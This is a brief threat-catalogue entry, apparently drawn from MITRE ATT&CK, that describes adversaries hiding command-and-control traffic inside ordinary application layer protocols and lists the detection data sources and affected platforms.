Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre